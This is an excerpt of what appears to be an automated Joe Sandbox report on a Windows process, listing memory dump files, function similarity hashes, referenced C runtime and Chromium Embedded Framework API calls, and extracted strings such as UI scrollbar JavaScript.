                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: ios_base::failbit set
                                                                                                                                                                            • API String ID: 2665656946-3924258884
                                                                                                                                                                            • Opcode ID: 372e2b47e2d3b0d854694287b5f130fe644ee4ade947c284ca8dfcb215dcd649
                                                                                                                                                                            • Instruction ID: 9893eca2e045d9730d27ce2a3d4cb5e0ed27b15bc486bfa2404ea76973a8f96a
                                                                                                                                                                            • Opcode Fuzzy Hash: 372e2b47e2d3b0d854694287b5f130fe644ee4ade947c284ca8dfcb215dcd649
                                                                                                                                                                            • Instruction Fuzzy Hash: 6931D0A6708B8181EF14DF36D24426A63A2EB04FE0F885731DA6E17BD9DE7CE061C714
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                            • API String ID: 1333004437-2891890143
                                                                                                                                                                            • Opcode ID: 659bed4bb908e209d6e638fb5e771b3dbb5b7a5e94ab5cc6538d6df8f816cc28
                                                                                                                                                                            • Instruction ID: 66da9532a48dc02fed78c0a1ee056b7630287ff8c856abe7e1980e8d1e5a0dce
                                                                                                                                                                            • Opcode Fuzzy Hash: 659bed4bb908e209d6e638fb5e771b3dbb5b7a5e94ab5cc6538d6df8f816cc28
                                                                                                                                                                            • Instruction Fuzzy Hash: 3331B6E5A0878685E710CF32E8502FBA7A0BF55B81F556135E94D63665DE2CE106CF40
                                                                                                                                                                            APIs
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DA0
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DB2
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45E3B
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$freemallocmemcpy
                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                            • API String ID: 1663771476-1405518554
                                                                                                                                                                            • Opcode ID: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                                                                                            • Instruction ID: 062fe4ca4d5a00a370cf4016fe6fa28eb8d695dd4f9dbfb94eaa6ecf2d496b38
                                                                                                                                                                            • Opcode Fuzzy Hash: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                                                                                            • Instruction Fuzzy Hash: CE31C9AAE08E8197FB548F35E9440BB67519F44FC0F48E036DA8E77759DE2CD8428B40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID: ContentSizeUpdate$scene
                                                                                                                                                                            • API String ID: 3041573648-1460969042
                                                                                                                                                                            • Opcode ID: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction ID: c768404ecc3d8f14d9ee735d730d065ef3bcfa388028b52f8272e433fc889ddd
                                                                                                                                                                            • Opcode Fuzzy Hash: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction Fuzzy Hash: 0931A663709A8281EE20EB28E490269E7B1FFC5B94F949531E78D47AB9DF3CC545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$strcmp
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 62325521-612978255
                                                                                                                                                                            • Opcode ID: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                                                                                            • Instruction ID: 5215c2e09c90479a92f22f23b60f369b5e2c501b4edfc692434bf64de612c31b
                                                                                                                                                                            • Opcode Fuzzy Hash: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 85314D62A09B8282DE20DF25E440169A7B1FF54FD4B888036EF8D47768DF38D55A8350
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFCED30: cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEDF0
                                                                                                                                                                              • Part of subcall function 00007FF79CFCED30: cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEE28
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCECD0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCED08
                                                                                                                                                                            Strings
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,, xrefs: 00007FF79CFCEC1F
                                                                                                                                                                            • scene/custom-scrollbars, xrefs: 00007FF79CFCEC31
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                                                                                            • String ID: scene/custom-scrollbars$var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,
                                                                                                                                                                            • API String ID: 2776152272-265620315
                                                                                                                                                                            • Opcode ID: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                                                                                            • Instruction ID: 2a7983837dd1e7777fe70579cf0d859e6dcd3b23c5b987d3e8443fcc5fd6b83f
                                                                                                                                                                            • Opcode Fuzzy Hash: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                                                                                            • Instruction Fuzzy Hash: A9317E23A0DA8391EE20EB28E490379A7B1FFC5794F948535E68D436A9DF3CD545CB20
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEDF0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEE28
                                                                                                                                                                            Strings
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i, xrefs: 00007FF79CFCED3F
                                                                                                                                                                            • scene/disable-select, xrefs: 00007FF79CFCED51
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: scene/disable-select$var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i
                                                                                                                                                                            • API String ID: 3856544966-2350028965
                                                                                                                                                                            • Opcode ID: 499257f57761436df129275114f696247c9856562f9705cf07a7c3b94c05bfd0
                                                                                                                                                                            • Instruction ID: 1231f6f74cc2c1c94c6718330f8fdd8e9914c7ee8004772e260a8d8fbb5d3dec
                                                                                                                                                                            • Opcode Fuzzy Hash: 499257f57761436df129275114f696247c9856562f9705cf07a7c3b94c05bfd0
                                                                                                                                                                            • Instruction Fuzzy Hash: F931702360DA8791EE20EB28E4903A9A7B1FFC5794F948135E68D436A9DF3CC545C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindNext$wcscpy_s
                                                                                                                                                                            • String ID: .
                                                                                                                                                                            • API String ID: 544952861-248832578
                                                                                                                                                                            • Opcode ID: 43a92e4ae7719266fdf7f74a34bd58c0e5cd43bcc5b0d63a8c54a700c8cf6607
                                                                                                                                                                            • Instruction ID: b2a9baec0f5ddaac8db8b04691a3a4985285dbc38f958b6776be305176d80b60
                                                                                                                                                                            • Opcode Fuzzy Hash: 43a92e4ae7719266fdf7f74a34bd58c0e5cd43bcc5b0d63a8c54a700c8cf6607
                                                                                                                                                                            • Instruction Fuzzy Hash: 98218EAAF0C68282EB609F35E8543BB63A0EB49B90F449131DA9D66784DF7CE445DB10
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DecodePointerfreeterminate
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 1319892530-1018135373
                                                                                                                                                                            • Opcode ID: 6134b3d9ee8e42ecd0a282cc438d3bc65ec7692e143b46020cd19bf630b9a02f
                                                                                                                                                                            • Instruction ID: d20e28456cc4e6aa0e1a377a8e1b283e7b4aa9c7fa627eac7e43ec3f9c394806
                                                                                                                                                                            • Opcode Fuzzy Hash: 6134b3d9ee8e42ecd0a282cc438d3bc65ec7692e143b46020cd19bf630b9a02f
                                                                                                                                                                            • Instruction Fuzzy Hash: 101145AAA09A4185EF658F34C05423A6360FF45F59F947335C95D272E1CF6CD4B6CB02
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set
                                                                                                                                                                            • API String ID: 1099746521-3882152299
                                                                                                                                                                            • Opcode ID: 8835a64955ff740848f4301bfa056b50858cadad722b641384f192b5b9dc1ffd
                                                                                                                                                                            • Instruction ID: f22daf4b3d98aac715d221fde8bafe02772c5d9b1911a580103c658c22876120
                                                                                                                                                                            • Opcode Fuzzy Hash: 8835a64955ff740848f4301bfa056b50858cadad722b641384f192b5b9dc1ffd
                                                                                                                                                                            • Instruction Fuzzy Hash: AA01D6EDA2C50691FB149E38C8513BF1351AF90344FE87039E62E65495EE7DE9269E00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B12A8E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                                                                            • API String ID: 661698970-2671469338
                                                                                                                                                                            • Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                                                                                                            • Instruction ID: df6840e45c0b12dcd340a94f9ac9f4da0edbc9c13ab08af02ca5885f4ad5fa91
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                                                                                                            • Instruction Fuzzy Hash: C0F0197B91860785E7646F31E18126E3774EF48B40F2AA171D74866256CF7CD491CB01
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B03524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFBC1B01222), ref: 00007FFBC1B03564
                                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B012A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                                                                            • API String ID: 661698970-2671469338
                                                                                                                                                                            • Opcode ID: 0aa23b011ebb7a1bca7b1b5cf97d93ad35b1e0d7ec6c205f0ee7290f04a45704
                                                                                                                                                                            • Instruction ID: 8768739af6d1db20c32ddcc723049e467b421aa962cfd6864cdf1ca6920f2d30
                                                                                                                                                                            • Opcode Fuzzy Hash: 0aa23b011ebb7a1bca7b1b5cf97d93ad35b1e0d7ec6c205f0ee7290f04a45704
                                                                                                                                                                            • Instruction Fuzzy Hash: 80F08CFA918606C6E7246F72E1C406A73A8FF4AB80F08B070D70C52662CF3CD4A0CE00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
